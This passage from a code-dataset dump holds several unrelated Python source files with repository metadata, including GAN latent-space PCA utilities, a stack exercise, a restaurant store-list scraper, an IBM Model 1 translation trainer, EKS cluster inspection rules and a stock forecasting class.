stack_to_global_t(ts, fs):\n    assert isinstance(ts, np.ndarray) and (ts.size % fs.size == 0), \\\n        'ts must be numpy array of shape (B, n_freq) or (n_freq)'\n\n    ts = ts.reshape(-1, fs.shape[-1])\n\n    B, num_f = ts.shape\n    assert num_f == len(fs), 'Len of ts and fs must match'\n\n    T, *ts = ts.T.reshape(num_f, B, 1) # (B, 1) for every frequency\n    f0, *fs = fs\n    assert f0 < 0.1, 'f0 is not linear'\n    assert all(f2 >= f1 for f2,f1 in zip(fs[1:], fs[:-1])), 'fs not sorted'\n\n    for f, t in zip(fs, ts):\n        # Remove offset w.r.t frequency,\n        # override with provided offset\n        T = T - np.fmod(T, 1/f) + np.fmod(t, 1/f)\n\n    return T\n\ndef parse_n_styles(net):\n    return net.num_ws\n\ndef parse_z_dims(net):\n    return net.z_dim\n\ndef parse_cond_type(net):\n    return rgetattr(net, 'init_kwargs.cond_args.type', 'none')\n\ndef pca_sanity(X, transformer):\n    # Statistics\n    #total_var = X.var(axis=0).sum() # total variance\n    #mean = X.mean(axis=0, keepdims=True) # mean\n    stdev = np.dot(transformer.components_, X.T).std(axis=1) # projected stdev\n\n    # Sort components based on explained variance\n    idx = np.argsort(stdev)[::-1]\n\n    # Components should be sorted by default\n    assert all(idx[1:] > idx[:-1]), 'PCA produced non-sorted basis'\n\n    # Check orthogonality\n    from itertools import combinations\n    dotps = [np.dot(*transformer.components_[[i, j]])\n        for (i, j) in combinations(range(X.shape[1]), 2)]\n    if not np.allclose(dotps, 0, atol=1e-4):\n        print('PCA components not orthogonal, max dot', np.abs(dotps).max())\n\n# Wrapper for computing pca in separate process\ndef pca_w_process(pipe, pkl, N=1_000_000, B=10_000):\n    import dnnlib\n    import pickle\n    \n    with dnnlib.util.open_url(pkl) as f:\n        G = pickle.load(f)['G_ema']\n    G = G.to('cpu') # don't need GPU for just mapping network\n    \n    comps = pca_w(G, N, B, lambda d : pipe.send(d))\n    pipe.send(comps)\n    pipe.close()\n\n# Run incremental PCA on W space\ndef pca_w(G, N=1_000_000, B=10_000, progress_callback=lambda t: None):\n    np.random.seed(0)\n    torch.random.manual_seed(0)\n    \n    N = (((N - 1) // B) + 1) * B\n\n    # Result of PCA depends on conditioning?\n    if G.mapping.c_dim > 0:\n        print('WARNING: PCA dependent on t, fixing to t=0.5')\n\n    # Run PCA\n    from sklearn.decomposition import IncrementalPCA\n    transformer = IncrementalPCA(150, whiten=False, batch_size=2*G.w_dim)\n\n    G.mapping.num_ws = 1 # don't broadcast result\n    \n    with torch.no_grad():\n        for b in range(0, N, B):\n            progress_callback(f'Computing PCA ({100*b//N}%)')\n            cs = 0.5 * torch.ones(B, G.mapping.c_dim) # no variation w.r.t. 
cond\n z = torch.randn(B, G.z_dim)\n w = G.mapping(z, cs, truncation_psi=1.0).reshape(-1, G.w_dim)\n transformer.partial_fit(w.numpy())\n\n # Check orthogonality etc.\n transformer.components_ = transformer.components_.astype(np.float32)\n stdev = np.sqrt(transformer.explained_variance_).astype(np.float32)\n #pca_sanity(X, transformer)\n\n return (transformer.components_, stdev)\n\ndef cff_max_layer(G):\n return len(_get_cff_layers(G))\n\ndef _get_cff_layers(G):\n include = ['affine', 'weight']\n exclude = ['rgb', 'affine_c', 'input']\n \n names = []\n for n, _ in named_params_and_buffers(G):\n incl = all(k in n.lower() for k in include)\n excl = any(k in n.lower() for k in exclude)\n if incl and not excl:\n names.append(n)\n \n return names\n\n# l_start, l_end: zero-based style indices\ncff_cache = cachetools.LRUCache(100)\n@cachetools.cached(cache=cff_cache, key=lambda G, s, e, m, c: hashkey(s, e, m)) # ignore uncachable vals\ndef compute_cff(G, l_start=0, l_end=None, mode='SVD U', progress_callback=lambda t: None):\n from scipy.linalg import svd\n\n progress_callback('Collecting weight matrices')\n names = _get_cff_layers(G)\n n_styles = parse_n_styles(G)\n\n assert len(names) > 0, 'No modulation weights in model, cannot compute CFF'\n if len(names) != n_styles - 1:\n print(f'WARN (CFF): number of mod_weights ({len(names)}) does not match layer count ({n_styles}) - 1')\n \n # Compute SVD of all chosen layers at once\n # => finds dirs that activate whole range at once\n # => all layers: close to PCA-W behavior\n # => single layer: localized changes\n s, e = (l_start, l_end or len(names))\n mats = [t.data.cpu().numpy().T for n,t in named_params_and_buffers(G) if n in names]\n weight_full = np.concatenate(mats[s:e], axis=1).astype(np.float32) # [512, ~5000]\n \n comp, stdev = (None, None)\n\n progress_callback('Computing decomposition...')\n\n # Left-singular SVD vectors\n if mode == 'SVD U':\n U, sigma, V = svd(weight_full, lapack_driver='gesvd') # more accurate triangular solver\n comp, stdev = (U.T, np.sqrt(sigma))\n elif mode == 'SVD V':\n # This mode makes no sense, can be e.g. shape [32, 32] for only last layer\n # ...unless applied not to w, but to s (i.e. 
after affine)?\n U, sigma, V = svd(weight_full, lapack_driver='gesvd')\n comp, stdev = (V.T, np.sqrt(sigma))\n elif mode == 'SeFa Unscaled':\n eigval, comps = np.linalg.eig(weight_full.dot(weight_full.T)) # WW^T = 512x512\n comp, stdev = (comps.T, eigval)\n elif mode == 'SeFa':\n weight_full = weight_full / np.linalg.norm(weight_full, axis=0, keepdims=True)\n eigval, comps = np.linalg.eig(weight_full.dot(weight_full.T)) # WW^T = 512x512\n comp, stdev = (comps.T, eigval)\n else:\n raise RuntimeError('Unknown CFF mode ' + mode)\n\n # Normalize, just to be sure\n comp /= np.linalg.norm(comp, axis=-1, keepdims=True) # [n_comp, w_dims]\n stdev = np.ones_like(stdev) # use ones instead for now\n\n progress_callback('')\n return (comp, stdev)\n\n# File copy with progress bar\n# For slow network drives etc.\ndef copy_with_progress(pth_from, pth_to):\n os.makedirs(pth_to.parent, exist_ok=True)\n size = int(os.path.getsize(pth_from))\n fin = open(pth_from, 'rb')\n fout = open(pth_to, 'ab')\n\n try:\n with tqdm(ncols=80, total=size, bar_format=pth_from.name + ' {l_bar}{bar} | Remaining: {remaining}') as pbar:\n while True:\n buf = fin.read(4*2**20) # 4 MiB\n if len(buf) == 0:\n break\n fout.write(buf)\n pbar.update(len(buf))\n except Exception as e:\n print(f'File copy failed: {e}')\n finally:\n fin.close()\n fout.close()\n\n# File open with progress bar\n# For slow network drives etc.\n# Supports context manager\ndef open_prog(pth, mode):\n size = int(os.path.getsize(pth))\n fin = open(pth, 'rb')\n\n assert mode == 'rb', 'Only rb supported'\n fout = BytesIO()\n\n try:\n with tqdm(ncols=80, total=size, bar_format=Path(pth).name + ' {l_bar}{bar}| Remaining: {remaining}') as pbar:\n while True:\n buf = fin.read(4*2**20) # 4 MiB\n if len(buf) == 0:\n break\n fout.write(buf)\n pbar.update(len(buf))\n except Exception as e:\n print(f'File copy failed: {e}')\n finally:\n fin.close()\n fout.seek(0)\n\n return fout","repo_name":"harskish/tlgan","sub_path":"viewer/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":15091,"program_lang":"python","lang":"en","doc_type":"code","stars":170,"dataset":"github-code","pt":"60"} +{"seq_id":"13382339979","text":"# * Program 15\n\nbooks = []\nbookdic = {}\n\n\ndef isEmpty(s):\n '''Checks if the stack is Empty or not.'''\n if len(s) == 0:\n return True\n return False\n\n\ndef enterdictionary():\n '''Stores the Book ID and Names of the Books in a dictionary.'''\n e = eval(\n input('Enter a dictionary containing Book ID And Book Name:\\n'))\n bookdic.update(e)\n\n\ndef pushvalues():\n '''Adds the names of the Books starting with A or C to a stack.'''\n for i in list(bookdic.values()):\n if i[0] in 'CcAa':\n books.append(i)\n bookdic.clear()\n\n\ndef popvalues():\n '''Removes and Returns a value from the stack.'''\n if isEmpty(books):\n return 'Stack Empty'\n return books.pop()\n\n\ndef peekvalues():\n '''Returns the topmost value from the stack.'''\n if isEmpty(books):\n return 'Stack Empty'\n return books[-1]\n\n\ndef display():\n '''Displays the whole stack from the top.'''\n if isEmpty(books):\n print('Stack Empty')\n for i in books[::-1]:\n print(i)\n\n\nd = 'Yy'\nwhile d in 'Yy':\n n = int(input('''Enter 1 to store book details like Book ID & Book Name in a dictionary format.\nEnter 2 to Push Names of the Books which start with A or C to stack.\nEnter 3 to Remove an element from the stack.\nEnter 4 to Peek the stack.\nEnter 5 to Display the stack.\\n'''))\n if n == 1:\n a = 'Yy'\n while a in 'Yy':\n enterdictionary()\n a = input('Do you want to add 
more records? (Y/N)\n')\n    elif n == 2:\n        pushvalues()\n    elif n == 3:\n        print(popvalues())\n    elif n == 4:\n        print(peekvalues())\n    elif n == 5:\n        display()\n    else:\n        print('Wrong Input!\nTry Again!')\n    d = input('Do you want to try again? (Y/N)\n')\n","repo_name":"ULTRAZAP/RecordPrograms","sub_path":"Programs/15thProgram.py","file_name":"15thProgram.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"24160341547","text":"import requests\n\nif __name__ == \"__main__\":\n    url = \"http://www.kfc.com.cn/kfccda/ashx/GetStoreList.ashx?op=keyword\"\n    headers = {\n        \"User-Agent\": \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 Edg/89.0.774.50\"\n    }\n    page = [1, 2, 3]\n    for p in page:\n        params = {\n            \"cname\": '',\n            \"pid\": '',\n            \"keyword\": \"成都\",\n            \"pageIndex\": str(p),\n            \"pageSize\": \"10\"\n        }\n        # Requesting a page with no results just returns empty data; it does not raise an error\n        try:\n            response = requests.post(url=url, headers=headers, params=params)\n            print(response.text)\n        except:\n            print(\"page \" + str(p) + \" error!\")\n    print(\"finish!\")","repo_name":"liuziqi/Crwaler","sub_path":"05.作业-爬取KFC餐厅信息.py","file_name":"05.作业-爬取KFC餐厅信息.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"24116241592","text":"# import nltk\r\nfrom nltk.tokenize import word_tokenize\r\nimport IBM1_EM\r\nimport string\r\nimport numpy as np\r\n\r\ndef sen_tokenizer(plist_sentence, pint_max_trans):\r\n    lst_final = list()\r\n    # (value, key)\r\n    word_dict = {} # will keep the word and order in its language\r\n    # (key, value)\r\n    reverse_dict = {}\r\n    int_order = 0\r\n    int_count = 0\r\n\r\n    # creating a table (33: None, ...) where 33 is the unicode of the characters\r\n    tbl_translate = dict((ord(char), None) for char in string.punctuation)\r\n\r\n    for lst_indiv_sen in plist_sentence[:pint_max_trans]:\r\n        if int_count == 0:\r\n            # The \ufeff is only found in the first line. 
It’s the beginning of the file.\r\n lst_indiv_sen = lst_indiv_sen.replace(u'\\ufeff', '')\r\n int_count += 1\r\n\r\n # returns a string where some specified characters are replaced with the character described in a dictionary\r\n lst_indiv_sen = lst_indiv_sen.translate(tbl_translate) #remove punctuation\r\n lst_tokens = word_tokenize(lst_indiv_sen.lower())\r\n\r\n str_output = \"\"\r\n\r\n # loop for storing the tokens in the two dictionaries and in the output string\r\n for str_token in lst_tokens:\r\n if str_token not in word_dict:\r\n word_dict[str_token] = int_order\r\n reverse_dict[int_order] = str_token\r\n int_order += 1\r\n # adding the token to the stored string\r\n str_output = str_output + str_token + \" \"\r\n\r\n str_output = str_output[:(len(str_output) - 1)] # remove last space\r\n\r\n # storing the output in the final list at the end\r\n lst_final.append(str_output)\r\n\r\n # replacing the ufeff character from document start with empty string\r\n lst_final[0] = lst_final[0].replace(u'\\ufeff', '') # ufeff character from document start\r\n return lst_final, word_dict, reverse_dict\r\n\r\n\r\ndef model_trainer():\r\n # Opening the data sets and putting it in an object\r\n with open(\"English.txt\", encoding=\"utf8\") as text_file:\r\n obj_data_en = text_file.readlines()\r\n\r\n with open(\"Tagalog.txt\", encoding=\"utf8\") as text_file:\r\n obj_data_fil = text_file.readlines()\r\n\r\n # Lists for the new data\r\n lst_new_en = list()\r\n lst_new_fil = list()\r\n\r\n for sen_counter in range(len(obj_data_en)):\r\n if sen_counter > 500000:\r\n break\r\n\r\n # Splits the sentence word by word\r\n current_en_sen = obj_data_en[sen_counter].split() #tokenizing current sentence\r\n current_fil_sen = obj_data_fil[sen_counter].split()\r\n\r\n # Adds the sentence at the end of the list\r\n lst_new_en.append(obj_data_en[sen_counter])\r\n lst_new_fil.append(obj_data_fil[sen_counter])\r\n\r\n # putting the tokenized data to the data variables\r\n # list of sentences where each sentence is a list of words\r\n obj_data_en = lst_new_en.copy() # obj_data_en is now a list of tokenized sentence\r\n obj_data_fil = lst_new_fil.copy() # i.e. 
a list of sentences where each sentence is a list of words\r\n\r\n max_trans = 14075\r\n # max_trans = 3000\r\n\r\n # for parsing the filipino sentences and tokenizing the words\r\n lst_fil_sen, fil_word_dict, reverse_fil_dict = sen_tokenizer(obj_data_fil, max_trans)\r\n\r\n # for parsing the english sentences and tokenizing the words\r\n lst_en_sen, en_word_dict, reverse_en_dict = sen_tokenizer(obj_data_en, max_trans)\r\n\r\n \r\n #run the EM algorithm of IBM Model 1\r\n translate_eng_fil = IBM1_EM.expect_max(fil_word_dict,en_word_dict,lst_fil_sen,lst_en_sen)\r\n \r\n\r\n # The following code finds out the maximum probability \r\n # for translating a tagalog/English word to English/tagalog\r\n # from the existing e-f matrix.\r\n # These maximum probabilities are stored in dictionaries \r\n # and saved as .npy files for being used for translation\r\n \r\n total_tagalog_ocurrences = translate_eng_fil.shape[0]\r\n total_eng_occurrences = translate_eng_fil.shape[1]\r\n\r\n #final dictionaries for translation mapping\r\n english_map = {}\r\n tagalog_map = {}\r\n\r\n for eng_marker in range(total_eng_occurrences): #for all foreign words f do\r\n maximum = -100\r\n i = 0\r\n for tagalog_marker in range(total_tagalog_ocurrences):\r\n #for all English words e do\r\n if translate_eng_fil[tagalog_marker][eng_marker] > maximum : \r\n maximum = translate_eng_fil[tagalog_marker][eng_marker]\r\n i = tagalog_marker\r\n\r\n english_map[reverse_en_dict[eng_marker]] = reverse_fil_dict[i]\r\n #end for\r\n #end for\r\n for tagalog_marker in range(total_tagalog_ocurrences): #for all foreign words f do\r\n maximum = -100\r\n i = 0\r\n for eng_marker in range(total_eng_occurrences):\r\n #for all English words e do\r\n if translate_eng_fil[tagalog_marker][eng_marker] > maximum : \r\n maximum = translate_eng_fil[tagalog_marker][eng_marker]\r\n i = eng_marker\r\n #end for\r\n tagalog_map[reverse_fil_dict[tagalog_marker]] = reverse_en_dict[i]\r\n #end for \r\n\r\n np.save(\"trained_data/tagalog_to_english_maximised\", tagalog_map)\r\n np.save(\"trained_data/english_to_tagalog_maximised\", english_map)\r\n","repo_name":"JakeCob/Project-AI","sub_path":"ModelTrainer.py","file_name":"ModelTrainer.py","file_ext":"py","file_size_in_byte":5313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42149076328","text":"import pygame\n\nclass Enemy():\n def __init__(self, x, y, radius, surface, player):\n\n self.surface = surface\n\n self.x = x\n self.y = y\n self.radius = radius\n\n self.player = player\n self.enemy_vel = 2\n \n def __draw(self):\n pygame.draw.circle(self.surface, (80, 150, 50), (self.x - self.player.cam_scroll[0], self.y - self.player.cam_scroll[1]), self.radius)\n\n def _enemyMovement(self):\n\n if self.radius > self.player.radius:\n if self.x < self.player.x:\n self.x += self.enemy_vel\n if self.x > self.player.x:\n self.x -= self.enemy_vel\n if self.y < self.player.y:\n self.y += self.enemy_vel\n if self.y > self.player.y:\n self.y -= self.enemy_vel\n \n elif self.radius <= self.player.radius:\n if self.x < self.player.x:\n self.x -= self.enemy_vel\n if self.x > self.player.x:\n self.x += self.enemy_vel\n if self.y < self.player.y:\n self.y -= self.enemy_vel\n if self.y > self.player.y:\n self.y += self.enemy_vel\n \n def update(self):\n self.__draw()\n 
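# editor's note (added comment, not in the original source): the movement rule in _enemyMovement makes an enemy larger than the player chase it, and a smaller one flee from it\n        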
self._enemyMovement()\n","repo_name":"R34prZ/PyGar.io","sub_path":"enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"20000043878","text":"import re\nimport kubernetes\nfrom hardeneks import helpers\nfrom hardeneks.rules import Rule, Result\nfrom hardeneks import Resources\nimport boto3\nimport pprint\n\nclass get_EKS_version(Rule):\n    _type = \"cluster_wide\"\n    pillar = \"cluster_data\"\n    section = \"control_plane\"\n    message = \"Get EKS Cluster Version\"\n    url = \"https://aws.github.io/aws-eks-best-practices/scalability/docs/control-plane/#use-eks-124-or-above\"\n\n    \n    \n    def check(self, resources: Resources):\n\n        eksclient = boto3.client(\"eks\", region_name=resources.region)\n        cluster_metadata = eksclient.describe_cluster(name=resources.cluster)\n        versionStr = cluster_metadata[\"cluster\"][\"version\"]\n        #version = int(versionStr.split('.')[-1])\n        \n        Info = \"EKS Cluster Version {}\".format(versionStr)\n        \n        self.result = Result(status=True, resource_type=\"EKS Cluster Version\", info=Info)\n\n    \n    \nclass get_EKS_cluster_endpoint_url(Rule):\n    _type = \"cluster_wide\"\n    pillar = \"cluster_data\"\n    section = \"control_plane\"\n    message = \"Get EKS Cluster Endpoint URL\"\n    url = \"https://aws.github.io/aws-eks-best-practices/scalability/docs/control-plane/#use-eks-124-or-above\"\n\n\n    def check(self, resources: Resources):\n        checkStatus = True\n        eksclient = boto3.client(\"eks\", region_name=resources.region)\n        cluster_metadata = eksclient.describe_cluster(name=resources.cluster)\n        cluster_endpoint = cluster_metadata[\"cluster\"][\"endpoint\"]\n        endpoint_public_access = cluster_metadata[\"cluster\"][\"resourcesVpcConfig\"][\"endpointPublicAccess\"]\n        endpoint_private_access = cluster_metadata[\"cluster\"][\"resourcesVpcConfig\"][\"endpointPrivateAccess\"]\n        endpointAccessString = \"public: \" + str(endpoint_public_access) + \", \" + \"private: \" + str(endpoint_private_access)\n        resource = endpointAccessString + \" \" + cluster_endpoint\n        self.result = Result(status=checkStatus, resource_type=\"EKS Cluster Endpoint URL\",resources=[resource],)\n    \n\n    \nclass get_cluster_vpc_subnets(Rule):\n    _type = \"cluster_wide\"\n    pillar = \"cluster_data\"\n    section = \"data_plane\"\n    message = \"Get EKS Cluster VPC & Subnets\"\n    url = \"https://aws.github.io/aws-eks-best-practices/scalability/docs/control-plane/#use-eks-124-or-above\"\n\n\n    def check(self, resources: Resources):\n        checkStatus = True\n        eksclient = boto3.client(\"eks\", region_name=resources.region)\n        cluster_metadata = eksclient.describe_cluster(name=resources.cluster)\n        vpcId = cluster_metadata[\"cluster\"][\"resourcesVpcConfig\"][\"vpcId\"]\n        subnetIds = cluster_metadata[\"cluster\"][\"resourcesVpcConfig\"][\"subnetIds\"]\n        subnetIdsString = \" \".join(subnetIds)\n        resource=f\"vpcId {vpcId} subnetIds {subnetIdsString}\"\n        self.result = Result(status=checkStatus, resource_type=\"EKS Cluster VPC & Subnet Ids\",resources=[resource],)\n    \n\n    \nclass get_available_free_ips_in_vpc(Rule):\n    _type = \"cluster_wide\"\n    pillar = \"cluster_data\"\n    section = \"data_plane\"\n    message = \"Check Available Free IPs in EKS VPC\"\n    url = \"https://aws.github.io/aws-eks-best-practices/scalability/docs/control-plane/#use-eks-124-or-above\"\n\n\n    def check(self, resources: Resources):\n        checkStatus = True\n        eksclient = boto3.client(\"eks\", region_name=resources.region)\n        cluster_metadata = 
eksclient.describe_cluster(name=resources.cluster)\n        vpcId = cluster_metadata[\"cluster\"][\"resourcesVpcConfig\"][\"vpcId\"]\n        subnetIds = cluster_metadata[\"cluster\"][\"resourcesVpcConfig\"][\"subnetIds\"]\n        subnets = boto3.resource(\"ec2\", region_name=resources.region).subnets.filter(\n            Filters=[{\"Name\": \"vpc-id\", \"Values\": [vpcId]}]\n        )\n        subnet_ids = [sn.id for sn in subnets]\n        ec2client = boto3.client('ec2', region_name=resources.region)\n        subnetsList = ec2client.describe_subnets(SubnetIds=subnet_ids)\n        \n        totalAvailableIpAddressCount = 0\n        for subnet in subnetsList['Subnets']:\n            totalAvailableIpAddressCount += subnet['AvailableIpAddressCount']\n        \n        resource=f\"Available Free IPs {totalAvailableIpAddressCount}\"\n        self.result = Result(status=checkStatus, resource_type=\"Available Free IPs in EKS VPC\",resources=[resource],)\n        \n\n\nclass get_cluster_size_details(Rule):\n    _type = \"cluster_wide\"\n    pillar = \"cluster_data\"\n    section = \"data_plane\"\n    message = \"Get Cluster Size Details\"\n    url = \"https://aws.github.io/aws-eks-best-practices/scalability/docs/control-plane/#use-eks-124-or-above\"\n\n\n    def check(self, resources: Resources):\n        checkStatus = True\n        \n        deployments = kubernetes.client.AppsV1Api().list_deployment_for_all_namespaces().items\n        services = kubernetes.client.CoreV1Api().list_service_for_all_namespaces().items\n        pods = kubernetes.client.CoreV1Api().list_pod_for_all_namespaces().items\n        nodeList = (kubernetes.client.CoreV1Api().list_node().items)\n        \n        resource=f\"Services : {len(services)} Deployments : {len(deployments)} Pods: {len(pods)} Nodes: {len(nodeList)}\"\n        \n        self.result = Result(status=checkStatus, resource_type=\"Size of the Cluster\",resources=[resource],)\n        \n\nclass get_nodegroups_provisioners(Rule):\n    _type = \"cluster_wide\"\n    pillar = \"cluster_data\"\n    section = \"data_plane\"\n    message = \"Get Node groups and Provisioners\"\n    url = \"https://aws.github.io/aws-eks-best-practices/scalability/docs/control-plane/#use-eks-124-or-above\"\n\n\n    def check(self, resources: Resources):\n        checkStatus = True\n        \n        nodeList = (kubernetes.client.CoreV1Api().list_node().items)\n        \n        eksmnglist = set()\n        selfmnglist=set()\n        provisionerlist=set()\n        linuxnglist=set()\n        windowsnglist=set()\n        \n        for node in nodeList:\n            labels = node.metadata.labels\n            \n            if 'eks.amazonaws.com/nodegroup' in labels.keys():\n                nodeName = labels['eks.amazonaws.com/nodegroup']\n                eksmnglist.add(nodeName)\n            elif 'alpha.eksctl.io/nodegroup-name' in labels.keys():\n                nodeName = labels['alpha.eksctl.io/nodegroup-name']\n                selfmnglist.add(nodeName)\n            elif 'karpenter.sh/provisioner-name' in labels.keys():\n                nodeName = labels['karpenter.sh/provisioner-name']\n                provisionerlist.add(nodeName)\n            else:\n                nodeName = \"Unknown-nodegroup\"\n            \n            if labels['kubernetes.io/os'] == \"linux\":\n                linuxnglist.add(nodeName)\n            elif labels['kubernetes.io/os'] == \"windows\":\n                windowsnglist.add(nodeName)\n        \n        linux_ng = \" \".join(list(linuxnglist))\n        windows_ng = \" \".join(list(windowsnglist))\n        resource=f\"EKS MNG : {len(eksmnglist)} Self MNG : {len(selfmnglist)} Provisioners: {len(provisionerlist)} Linux NGs: {linux_ng} Windows NGs: {windows_ng}\"\n        self.result = Result(status=checkStatus, resource_type=\"Node groups and Provisioners\",resources=[resource],)\n    \n\nclass get_fargate_profiles(Rule):\n    _type = \"cluster_wide\"\n    pillar = \"cluster_data\"\n    section = \"data_plane\"\n    message = \"Get EKS Fargate Profiles\"\n    url = \"https://aws.github.io/aws-eks-best-practices/scalability/docs/control-plane/#use-eks-124-or-above\"\n\n\n    def check(self, resources: 
Resources):\n \n eksclient = boto3.client(\"eks\", region_name=resources.region) \n response = eksclient.list_fargate_profiles(clusterName=resources.cluster,)\n \n Info = \"EKS Fargate Profiles: \" + \" \".join(response['fargateProfileNames'])\n #print(pprint.pformat(response['fargateProfileNames'], indent=4))\n \n self.result = Result(status=True, resource_type=\"EKS Fargate Profiles\", info=Info)\n \n","repo_name":"abhisnan/hardeneks","sub_path":"hardeneks/cluster_wide/cluster_data/cluster_data.py","file_name":"cluster_data.py","file_ext":"py","file_size_in_byte":7955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"60"} +{"seq_id":"44541279710","text":"import json\nimport time\nimport logging\nimport traceback\nfrom uuid import uuid4\n\nfrom yukon.domain.registers.apply_configuration_request import ApplyConfigurationRequest\nfrom yukon.domain.registers.update_register_request import UpdateRegisterRequest\nfrom yukon.services.api import is_configuration_simplified, add_register_update_log_item\nfrom yukon.services.value_utils import unexplode_value\nfrom yukon.domain.god_state import GodState\n\nlogger = logging.getLogger(__name__)\n\n\nasync def do_apply_configuration_work(state: GodState, config: ApplyConfigurationRequest) -> None:\n if config.node_id and not config.is_network_config:\n data = json.loads(config.configuration)\n if is_configuration_simplified(data):\n at_least_one_register_was_modified = False\n for register_name, register_value in data.items():\n prototype_string = state.avatar.avatars_by_node_id[int(config.node_id)].registers_exploded_values.get(\n register_name, None\n )\n if prototype_string is None:\n logger.log(logging.ERROR, \"Register %s does not exist on node %d\" % (register_name, config.node_id))\n add_register_update_log_item(state, register_name, None, config.node_id, False)\n continue\n at_least_one_register_was_modified = True\n prototype = unexplode_value(prototype_string)\n unexploded_value = unexplode_value(register_value, prototype)\n state.queues.god_queue.put_nowait(\n UpdateRegisterRequest(uuid4(), register_name, unexploded_value, config.node_id, time.time())\n )\n if not at_least_one_register_was_modified:\n logger.warning(\"No registers were modified on node %d\", config.node_id)\n else:\n for potential_node_id, v in data.items():\n if potential_node_id == \"__file_name\":\n continue\n for register_name, value in v.items():\n if isinstance(value, str):\n logger.debug(\"Do something\")\n value = json.loads(value)\n unexploded_value = unexplode_value(value)\n state.queues.god_queue.put_nowait(\n UpdateRegisterRequest(uuid4(), register_name, unexploded_value, config.node_id, time.time())\n )\n elif config.is_network_config:\n logger.debug(\"Setting configuration for all configured nodes\")\n data = json.loads(config.configuration)\n for node_id, registers_values_exploded in data.items():\n if \"__\" in node_id:\n continue\n # If register_values_exploded is not a dict, it is an error\n if not isinstance(registers_values_exploded, dict):\n logger.error(f\"Configuration for node {node_id} is not a dict\")\n continue\n for k, v in registers_values_exploded.items():\n state.queues.god_queue.put_nowait(\n UpdateRegisterRequest(uuid4(), k, unexplode_value(v), int(node_id), time.time())\n )\n else:\n tb = traceback.format_exc()\n 
logger.critical(tb)\n","repo_name":"OpenCyphal/yukon","sub_path":"yukon/services/cyphal_worker/update_configuration_work.py","file_name":"update_configuration_work.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"60"} +{"seq_id":"27851365773","text":"#Authors: Duy Thanh Tran, Prof. Jun-Ho Huh, Prof. Jae-Hwan Kim\r\n#Data Science Lab - KMOU\r\n#Department of Data Science, (National) Korea Maritime and Ocean University, Busan 49112, Republic of Korea.\r\n#Created Date: May-17/2022\r\n# Model 1 (trend)\r\nfrom sklearn.linear_model import LinearRegression\r\n\r\n# Model 2\r\nfrom sklearn.neighbors import KNeighborsRegressor\r\n\r\n# Create LinearRegression and KNeighborsRegressor hybrid for LucyHybrid object\r\nfrom LucyDataExecutor import LucyDataExecutor\r\nfrom LucyHybrid import LucyHybrid\r\nfrom LucyUtil import LucyUtil\r\n\r\nplot_params = dict(\r\n color=\"0.75\",\r\n style=\".-\",\r\n markeredgecolor=\"0.25\",\r\n markerfacecolor=\"0.25\",\r\n legend=False,\r\n)\r\n\r\ndataexec=LucyDataExecutor()\r\ndataexec.load_data()\r\ndataexec.normalize(2017)\r\ndataexec.setup_feature_target()\r\n\r\nmodel = LucyUtil.loadmodel(\"models\\ElasticNet_ExtraTreesRegressor.zip\")\r\n\r\ntraindate=\"2017-07-01\"\r\nvaliddate=\"2017-07-02\"\r\ny_train, y_valid = dataexec.y_train_valid(traindate, validdate)\r\nX1_train, X1_valid = dataexec.X1_train_valid(traindate,validdate)\r\nX2_train, X2_valid = dataexec.X2_train_valid(traindate,validdate)\r\n#call predict method\r\ny_fit = model.predict(X1_train, X2_train).clip(0.0)\r\ny_pred = model.predict(X1_valid, X2_valid).clip(0.0)\r\n\r\nmetric=model.evaluate(y_train,y_fit,y_valid,y_pred)\r\nmetric.printmetric()\r\n","repo_name":"thanhtd32/LucyHybrid","sub_path":"RunLoadSingle_LucyHybridModel.py","file_name":"RunLoadSingle_LucyHybridModel.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4157065764","text":"import matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport datetime\nfrom datetime import date\nimport yfinance as yf\nimport numpy as np\nfrom io import BytesIO\nimport base64\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import mean_squared_error\n\n\nclass Stocks:\n def __init__(self, symbol, algorithm, forcast_time_span):\n self.symbol = symbol\n self.algorithm = algorithm\n self.data_points = 1000\n self.forcast_time_span = forcast_time_span\n self.delta_days = 720\n self.training_segment = None\n self.start = None\n self.end = None\n self.steps = None\n self.data = None\n self.x_train = None\n self.y_train = None\n self.x_test = None\n self.y_test = None\n self.steps = None\n self.plot = None\n\n if algorithm in ['randomforest', 'lstm']:\n self.algorithm = algorithm\n else:\n raise ValueError(f'Machine learning algorithm: {algorithm} is not available.')\n\n if forcast_time_span in ['1d', '5d', '1mo', '6mo', '1y']:\n self.forcast_time_span = forcast_time_span\n else:\n raise ValueError(f'Forcast time span of {forcast_time_span} is not available')\n\n # Steps are used for number of iterations to self feed back into the prediction/forcast model.\n # The granularity for these forcast time spans are something we will need to experiment with to achieve\n # the best prediction accuracy.\n if forcast_time_span == '1d':\n # About 7 hours in a trading day\n self.steps = 7\n self.granularity = '1h'\n if forcast_time_span 
